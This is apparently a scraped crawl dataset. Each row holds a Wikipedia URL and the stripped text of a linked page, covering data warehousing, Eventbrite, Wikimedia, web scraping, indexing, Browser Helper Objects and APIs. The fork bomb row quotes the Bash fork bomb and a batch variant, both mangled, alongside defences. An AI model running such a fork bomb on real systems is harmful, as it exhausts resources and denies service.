hybrid (also called ensemble) data warehouse database is kept on third normal form to eliminate data redundancy. A normal relational database, however, is not efficient for business intelligence reports where dimensional modelling is prevalent. Small data marts can shop for data from the consolidated warehouse and use the filtered, specific data for the fact tables and dimensions required. The data warehouse provides a single source of information from which the data marts can read, providing a wide range of business information. The hybrid architecture allows a data warehouse to be replaced with a master data management repository where operational (not static) information could reside. The data vault modeling components follow hub and spokes architecture. This modeling style is a hybrid design, consisting of the best practices from both third normal form and star schema. The data vault model is not a true third normal form, and breaks some of its rules, but it is a top-down architecture with a bottom up design. The data vault model is geared to be strictly a data warehouse. It is not geared to be end-user accessible, which, when built, still requires the use of a data mart or star schema-based release area for business purposes. There are basic features that define the data in the data warehouse that include subject orientation, data integration, time-variant, nonvolatile data, and data granularity. Unlike the operational systems, the data in the data warehouse revolves around the subjects of the enterprise. Subject orientation is not database normalization. Subject orientation can be really useful for decision-making. Gathering the required objects is called subject-oriented. The data found within the data warehouse is integrated. Since it comes from several operational systems, all inconsistencies must be removed. Consistencies include naming conventions, measurement of variables, encoding structures, physical attributes of data, and so forth. While operational systems reflect current values as they support day-to-day operations, data warehouse data represents a long time horizon (up to 10 years) which means it stores mostly historical data. It is mainly meant for data mining and forecasting. (E.g. if a user is searching for a buying pattern of a specific customer, the user needs to look at data on the current and past purchases.) 28 The data in the data warehouse is read-only, which means it cannot be updated, created, or deleted (unless there is a regulatory or statutory obligation to do so). 29 In the data warehouse process, data can be aggregated in data marts at different levels of abstraction. The user may start looking at the total sale units of a product in an entire region. Then the user looks at the states in that region. Finally, they may examine the individual stores in a certain state. Therefore, typically, the analysis starts at a higher level and drills down to lower levels of details. 28 With data virtualization, the data used remains in its original locations and real-time access is established to allow analytics across multiple sources creating a virtual data warehouse. This can aid in resolving some technical difficulties such as compatibility problems when combining data from various platforms, lowering the risk of error caused by faulty data, and guaranteeing that the newest data is used. Furthermore, avoiding the creation of a new database containing personal information can make it easier to comply with privacy regulations. However, with data virtualization, the connection to all necessary data sources must be operational as there is no local copy of the data, which is one of the main drawbacks of the approach. 30 The different methods used to construct organize a data warehouse specified by an organization are numerous. The hardware utilized, software created and data resources specifically required for the correct functionality of a data warehouse are the main components of the data warehouse architecture. All data warehouses have multiple phases in which the requirements of the organization are modified and fine-tuned. 31 Operational systems are optimized for the preservation of data integrity and speed of recording of business transactions through use of database normalization and an entity relationship model. Operational system designers generally follow Codd's 12 rules of database normalization to ensure data integrity. Fully normalized database designs (that is, those satisfying all Codd rules) often result in information from a business transaction being stored in dozens to hundreds of tables. Relational databases are efficient at managing the relationships between these tables. The databases have very fast insert update performance because only a small amount of data in those tables is affected each time a transaction is processed. To improve performance, older data are usually periodically purged from operational systems. Data warehouses are optimized for analytic access patterns. Analytic access patterns generally involve selecting specific fields and rarely if ever select , which selects all fields columns, as is more common in operational databases. Because of these differences in access patterns, operational databases (loosely, OLTP) benefit from the use of a row-oriented DBMS whereas analytics databases (loosely, OLAP) benefit from the use of a column-oriented DBMS. Unlike operational systems which maintain a snapshot of the business, data warehouses generally maintain an infinite history which is implemented through ETL processes that periodically migrate data from the operational systems over to the data warehouse. These terms refer to the level of sophistication of a data warehouse: |
546 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Eventbrite | Eventbrite is an American event management and ticketing website. The service allows users to browse, create, and promote local events. The service charges a fee to event organizers in exchange for online ticketing services, unless the event is free. 2 In September or October 2023, Eventbrite changed their pricing plans to limit free events to 25 tickets before they would begin to charge organizers fees. 3 Launched in 2006 and headquartered in San Francisco, Eventbrite opened their first international office in the United Kingdom in 2012. The company has local offices in Nashville, London, Cork, Amsterdam, Dublin, Berlin, Melbourne, Mendoza, Madrid, and S o Paulo. 2 The company went public on the New York Stock Exchange on September 20, 2018 under the ticker symbol EB. 4 Eventbrite was founded in 2006 by Kevin Hartz (Co-Founder and Executive Chairman) and Julia Hartz (Co-Founder and CEO) and Renaud Visage (Co-Founder and CTO). The company was the first major player in this market in the US. 5 Prior to his position at the company, Kevin Hartz was involved with PayPal and was the Co-Founder and CEO of Xoom Corporation, an international money transfer company. Julia Hartz, wife of Kevin, was raised in Santa Cruz, CA. After studying broadcasting at Pepperdine University, she became a creative executive at FX Network in Los Angeles. Soon after the two became engaged, she moved to the Bay Area and helped co-found Eventbrite. citation needed On March 18, 2011 Eventbrite raised $50 million in Series E Financing led by Tiger Global. 6 On April 22, 2013, Eventbrite raised another $60 million in growth capital financing led by Tiger Global, and including T. Rowe Price. 7 On March 13, 2014, Eventbrite raised a private equity round of $60 million, 8 and on September 1, 2017, the company raised $134 million in a Series G funding round. This brought their total funding to $334 million. Previous funding involved firms including Sequoia Capital, DAG Ventures and Tenaya Capital. 9 In 2016, Julia became the CEO of Eventbrite, while Kevin took the role of executive chairman. 10 In March 2017, Eventbrite purchased D.C. based event tech startup Nvite for an undisclosed sum. 11 On June 9, 2017 Eventbrite purchased Ticketfly from Pandora for $200 million. 12 The acquisition was meant to strengthen Eventbrite's position in the live music market, but according to observers, executives were still struggling to integrate Ticketfly as of 2019. 13 In April 2018, Eventbrite acquired the Spanish ticketing service Ticketea, citing its events discovery platform and "robust ecosystem of third-party integrations" as being advantageous. 14 Later that month, Eventbrite was subjected to criticism over an update to its merchants' agreement, which specified that the service had the right to attend and record footage of any aspect of an event for any purpose, and that event organizers were "responsible for obtaining, at your own cost, all third party permissions, clearances, and licenses necessary to secure Eventbrite the permissions and rights to do so . Following public backlash, Eventbrite chose to remove the passage entirely. The company stated that it wanted the option to "work with individual organizers to secure video and photos at their events for marketing and promotional purposes", but admitted that the clauses were too broadly-worded. 15 In August 2018, Picatic, a Vancouver-based ticketing and event registration platform, was acquired by Eventbrite. 16 17 In April 2020, during the coronavirus pandemic which was causing a drastic drop in in-person events, Eventbrite laid off around 45% of its employees, which at that point numbered between 1,000 and 1,100. 13 Reportedly, online events had amounted to less than 10% of the company's revenue in 2019. 13 In November 2020, the company acquired ToneDen, a social media marketing service based in Los Angeles. 18 In September or October 2023, the company revamped their pricing plans. They no longer offered fully free services for larger free events. They created a limit of 25 tickets to remain inside a fully free tier, and events with more tickets would be charged for services. 3 On March 18, 2011, Eventbrite raised $50 million in Series E Financing led by Tiger Global. 6 On April 22, 2013, Eventbrite raised another $60 million in growth capital financing led by Tiger Global, and including T. Rowe Price. 19 On August 23, 2018, the company filed for a $200 million IPO. 4 The company's biggest shareholder is Tiger Global Management with Sequoia Capital and the Hartzs also owning significant shares. 20 In 2019, Eventbrite laid off 8% of their workforce to cut costs amid worries of an economic downturn. It also planned to relocate about 30% of the remaining roles, including moving certain development roles to Spain and India from Argentina and the U.S. The company added it will relocate nearly all of the customer support and operations roles to locations outside the U.S. 21 |
547 | https://en.wikipedia.org/wiki/Web_scraping | https://wikimediafoundation.org/ | The nonprofit Wikimedia Foundation provides the essential infrastructure for free knowledge. We host Wikipedia, the free online encyclopedia, created, edited, and verified by volunteers around the world, as well as many other vital community projects. All of which is made possible thanks to donations from individuals like you. We welcome anyone who shares our vision to join us in collecting and sharing knowledge that fully represents human diversity. Protect and sustain Wikipedia Donations are secure 1 You made it. It is yours to use. For free. That means you can use it, adapt it, or share what you find on Wikimedia sites. Just do not write your own bio, or copy paste it into your homework. 2 We do not sell your email address or any of your personal information to third parties. More information about our privacy practices are available at the Wikimedia Foundation privacy policy, donor privacy policy, and data retention guidelines. 3 Readers verify the facts. Articles are collaboratively created and edited by a community of volunteers using reliable sources, so no single person or company owns a Wikipedia article. The Wikimedia Foundation does not write or edit, but you and everyone you know can help. 4 The word “wiki” refers to a website built using collaborative editing software. Projects with no past or existing affiliation with Wikipedia or the Wikimedia Foundation, such as Wikileaks and wikiHow, also use the term. Although these sites also use “wiki” in their name, they have nothing to do with Wikimedia. 280,000 editors contribute to Wikimedia projects every month 100 million media files on Wikimedia Commons and counting 1.5 billion unique devices access Wikimedia projects every month We conduct our own research and partner with researchers worldwide to address change in society and technology. From site reliability to machine learning, our open-source technology makes Wikipedia faster, more reliable, and more accessible worldwide. We fight to protect everyone’s right to access free and open knowledge. Our volunteers build tools, share photos, write articles, and are working to connect all the knowledge that exists. Free encyclopedia written in over 300 languages by volunteers around the world. The world’s largest free-to-use-library of illustrations, photos, drawings, videos and music. The nineteenth edition of the global event will take place in Katowice, Poland (the 2024 European City of Science), from 7 10 August. The Foundation supports challenges to laws in Texas and Florida that jeopardize Wikipedia’s community-led governance model and the right to freedom of expression. Throughout history, knowledge has been controlled by a powerful few. Wikipedia needs knowledge from all languages and cultures. The internet has become the default for accessing information—women, people of color, and the global south remain underrepresented. We invite you to help correct history. As a nonprofit, Wikipedia and our related free knowledge projects are powered primarily through donations. Wikimania Katowice 2024 Bird Header Wikimedia Foundation CC BY-SA 4.0 US Supreme Court File provided by Wikimedia Commons Jarek Tuszy ski CC BY-SA 3.0 Armine Aghayan File provided by Wikimedia Commons Victor Grigas CC BY-SA 3.0 Vitor Mazuco File provided by Wikimedia Commons Matthew (WMF) CC BY-SA 3.0 Sam Oye - Wiki Indaba 2017 File provided by Wikimedia Commons Zachary McCune Wikimedia Foundation CC BY-SA 4.0 Knowledge Is Human Homepage Animated Banner File provided by Wikimedia Commons Hannah Jacobs for the Wikimedia Foundation CC0 1.0 Wikimedia Conference 2017 File provided by Wikimedia Commons Jason Kr ger Wikimedia Deutschland e.V. CC BY-SA 4.0 Papaul Tshibamba 3 File provided by Wikimedia Commons Victor Grigas CC BY SA 3.0 SOPA protest in Midtown NYC File provided by Wikimedia Commons Zachary McCune CC BY-SA 4.0 Wikipedia logo File provided by Wikimedia Commons Nohat; Paullusmagnus; Wikimedia CC-BY-SA 3.0 Wikimedia Commons logo File provided by Wikimedia Commons Reidab; User:Grunt; 3247 Public domain Art Feminism Wikipedia edit-a-thon File provided by Wikimedia Commons Jens Mohr CC BY-SA 3.0 The Wikimedia Foundation, Inc is a nonprofit charitable organization dedicated to encouraging the growth, development and distribution of free, multilingual content, and to providing the full content of these wiki-based projects to the public free of charge. |
548 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Fork_bomb | In computing, a fork bomb (also called rabbit virus) is a denial-of-service (DoS) attack wherein a process continually replicates itself to deplete available system resources, slowing down or crashing the system due to resource starvation. Around 1978, an early variant of a fork bomb called wabbit was reported to run on a System 360. It may have descended from a similar attack called RABBITS reported from 1969 on a Burroughs 5500 at the University of Washington. 1 Fork bombs operate both by consuming CPU time in the process of forking, and by saturating the operating system's process table. 2 3 A basic implementation of a fork bomb is an infinite loop that repeatedly launches new copies of itself. In Unix-like operating systems, fork bombs are generally written to use the fork system call. 3 As forked processes are also copies of the first program, once they resume execution from the next address at the frame pointer, they continue forking endlessly within their own copy of the same infinite loop; this has the effect of causing an exponential growth in processes. As modern Unix systems generally use a copy-on-write resource management technique when forking new processes, 4 a fork bomb generally will not saturate such a system's memory. Microsoft Windows operating systems do not have an equivalent functionality to the Unix fork system call; 5 a fork bomb on such an operating system must therefore create a new process instead of forking from an existing one, such as with batch echo. 0 0 .c md nul, which can be written more clearly as echo 0 0 .cmd . In it, 0 0 is written to .cmd, which is then executed by . 6 A classic example of a fork bomb is one written in Unix shell :() : : ;:, possibly dating back to 1999, 7 which can be more easily understood as In it, a function is defined (fork()) as calling itself (fork), then piping ( ) its result into itself, all in a background job ( ). The code using a colon : as the function name is not valid in a shell as defined by POSIX, which only permits alphanumeric characters and underscores in function names. 8 However, its usage is allowed in GNU Bash as an extension. 9 As a fork bomb's mode of operation is entirely encapsulated by creating new processes, one way of preventing a fork bomb from severely affecting the entire system is to limit the maximum number of processes that a single user may own. On Linux, this can be achieved by using the ulimit utility; for example, the command ulimit -u 30 would limit the affected user to a maximum of thirty owned processes. 10 On PAM-enabled systems, this limit can also be set in etc security limits.conf, 11 and on BSD, the system administrator can put limits in etc login.conf. 12 Modern Linux systems also allow finer-grained fork bomb prevention through cgroups and process number (PID) controllers. 13 |
549 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#Computer_vision_web-page_analysis | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
550 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_indexing | Web indexing, or Internet indexing, comprises methods for indexing the contents of a website or of the Internet as a whole. Individual websites or intranets may use a back-of-the-book index, while search engines usually use keywords and metadata to provide a more useful vocabulary for Internet or onsite searching. With the increase in the number of periodicals that have articles online, web indexing is also becoming important for periodical websites. 1 Back-of-the-book-style web indexes may be called "web site A-Z indexes". 2 The implication with "A-Z" is that there is an alphabetical browse view or interface. This interface differs from that of a browse through layers of hierarchical categories (also known as a taxonomy) which are not necessarily alphabetical, but are also found on some web sites. Although an A-Z index could be used to index multiple sites, rather than the multiple pages of a single site, this is unusual. Metadata web indexing involves assigning keywords, description or phrases to web pages or web sites within a metadata tag (or "meta-tag") field, so that the web page or web site can be retrieved with a list. This method is commonly used by search engine indexing. 3 4. What is Website Indexing? This Internet-related article is a stub. You can help Wikipedia by expanding it. |
551 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=13 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
552 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Browser_Helper_Object | A Browser Helper Object (BHO) is a DLL module designed as a plugin for the Microsoft Internet Explorer web browser to provide added functionality. BHOs were introduced in October 1997 with the release of version 4 of Internet Explorer. Most BHOs are loaded once by each new instance of Internet Explorer. However, in the case of Windows Explorer, a new instance is launched for each window. BHOs are still supported as of Windows 10, through Internet Explorer 11, while BHOs are not supported in Microsoft Edge. Each time a new instance of Internet Explorer starts, it checks the Windows Registry for the key HKEY LOCAL MACHINE SOFTWARE Microsoft Windows CurrentVersion Explorer Browser Helper Objects. If Internet Explorer finds this key in the registry, it looks for a CLSID key listed below the key. The CLSID keys under Browser Helper Objects tell the browser which BHOs to load. Removing the registry key prevents the BHO from being loaded. For each CLSID that is listed below the BHO key, Internet Explorer calls CoCreateInstance to start the instance of the BHO in the same process space as the browser. If the BHO is started and implements the IObjectWithSite interface, it can control and receive events from Internet Explorer. BHOs can be created in any language that supports COM. 1 Some modules enable the display of different file formats not ordinarily interpretable by the browser. The Adobe Acrobat plug-in that allows Internet Explorer users to read PDF files within their browser is a BHO. Other modules add toolbars to Internet Explorer, such as the Alexa Toolbar that provides a list of web sites related to the one you are currently browsing, or the Google Toolbar that adds a toolbar with a Google search box to the browser user interface. The Conduit toolbars are based on a BHO that can be used on Internet Explorer 7 and up. This BHO provides a search facility that connects to Microsoft's Bing search. The BHO API exposes hooks that allow the BHO to access the Document Object Model (DOM) of the current page and to control navigation. Because BHOs have unrestricted access to the Internet Explorer event model, some forms of malware (such as adware and spyware) have also been created as BHOs. 2 3 For example, the Download.ject malware is a BHO that is activated when a secure HTTP connection is made to a financial institution, then begins to record keystrokes for the purpose of capturing user passwords. The MyWay Searchbar tracks users' browsing patterns and passes the information it records to third parties. The C2.LOP malware adds links and popups of its own to web pages in order to drive users to pay-per-click websites. citation needed Many BHOs introduce visible changes to a browser's interface, such as installing toolbars in Internet Explorer and the like, but others run without any change to the interface. This renders it easy for malicious coders to conceal the actions of their browser add-on, especially since, after being installed, the BHO seldom requires permission before performing further actions. For instance, variants of the ClSpring trojan use BHOs to install scripts to provide a number of instructions to be performed such as adding and deleting registry values and downloading additional executable files, all completely transparently to the user. 4 In response to the problems associated with BHOs and similar extensions to Internet Explorer, Microsoft debuted an Add-on Manager in Internet Explorer 6 with the release of Service Pack 2 for Windows XP (updating it to IE6 Security Version 1, a.k.a. SP2). This utility displays a list of all installed BHOs, browser extensions and ActiveX controls, and allows the user to enable or disable them at will. There are also free tools (such as BHODemon) that list installed BHOs and allow the user to disable malicious extensions. Spybot S D advanced mode has a similar tool built in to allow the user to disable installed BHO. |
553 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Application_programming_interface | An application programming interface (API) is a way for two or more computer programs or components to communicate with each other. It is a type of software interface, offering a service to other pieces of software. 1 A document or standard that describes how to build or use such a connection or interface is called an API specification. A computer system that meets this standard is said to implement or expose an API. The term API may refer either to the specification or to the implementation. Whereas a system's user interface dictates how its end-users interact with the system in question, its API dictates how to write code that takes advantage of that system's capabilities. In contrast to a user interface, which connects a computer to a person, an application programming interface connects computers or pieces of software to each other. It is not intended to be used directly by a person (the end user) other than a computer programmer who is incorporating it into the software. An API is often made up of different parts which act as tools or services that are available to the programmer. A program or a programmer that uses one of these parts is said to call that portion of the API. The calls that make up the API are also known as subroutines, methods, requests, or endpoints. An API specification defines these calls, meaning that it explains how to use or implement them. One purpose of APIs is to hide the internal details of how a system works, exposing only those parts that a programmer will find useful, and keeping them consistent even if the internal details change later. An API may be custom-built for a particular pair of systems, or it may be a shared standard allowing interoperability among many systems. There are APIs for programming languages, software libraries, computer operating systems, and computer hardware. APIs originated in the 1940s, though the term did not emerge until the 1960s and 1970s. Contemporary usage of the term API often refers to web APIs, 2 which allow communication between computers that are joined by the internet. Recent developments in APIs have led to the rise in 